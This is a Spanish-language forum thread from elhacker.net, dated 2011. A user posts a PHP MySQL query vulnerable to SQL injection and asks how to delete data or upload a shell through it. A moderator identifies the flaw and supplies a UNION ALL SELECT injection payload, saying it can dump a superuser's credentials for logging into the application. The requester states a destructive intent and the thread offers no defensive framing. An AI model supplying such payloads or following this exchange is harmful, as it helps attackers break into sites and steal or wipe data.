elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  SQL injection, obtener mas informacion o borrara datos		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SQL injection, obtener mas informacion o borrara datos  (Leído 3,644 veces)
xalupeao

Desconectado Desconectado

Mensajes: 18


Ver Perfil WWW
SQL injection, obtener mas informacion o borrara datos
« en: 7 Marzo 2011, 09:29 am »
Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código:
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código:
if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.
En línea
Silverhost Hosting Chile - La empresa lider de Hosting en Chile .
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: SQL injection, obtener mas informacion o borrara datos
« Respuesta #1 en: 7 Marzo 2011, 18:31 pm »
Te encuentras en frente de una iSQL básica. Es sólo cuestión de inyectarle código para printear los datos de un super usuario, y así logguearte dentro de la aplicación. En este caso sería algo como,
Código
  1. #
  2. SELECT question, answer, lasteditedby, lastedit
  3.   FROM faq
  4.  WHERE id=''+UNION+ALL+SELECT+1,2,3,4--'
  5. #

La inyección sería,
Código
  1. '+union+all+select+1,2,3,4--

Tienes que leer tutoriales :D
En línea
Te vendería mi talento por poder dormir tranquilo.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Obtener tablas con SQL Injection (mysql 4)
Nivel Web 		Leber 3 16,078 Último mensaje 12 Septiembre 2009, 11:38 am
por tomrian
Obtener informacion?
Programación Visual Basic 		CAR3S? 7 4,929 Último mensaje 13 Febrero 2011, 23:54 pm
por CAR3S?
Informacion tablas y columnas con sql injection en mysql 4.x
Nivel Web 		opportunity 4 6,372 Último mensaje 1 Marzo 2011, 08:06 am
por opportunity
El 31 de julio Google borrará los perfiles privados
Noticias 		wolfbcn 0 2,035 Último mensaje 16 Marzo 2011, 02:11 am
por wolfbcn
INFORMACION volcado datos de ruter
Redes 		taladro5 1 1,810 Último mensaje 18 Julio 2014, 15:39 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines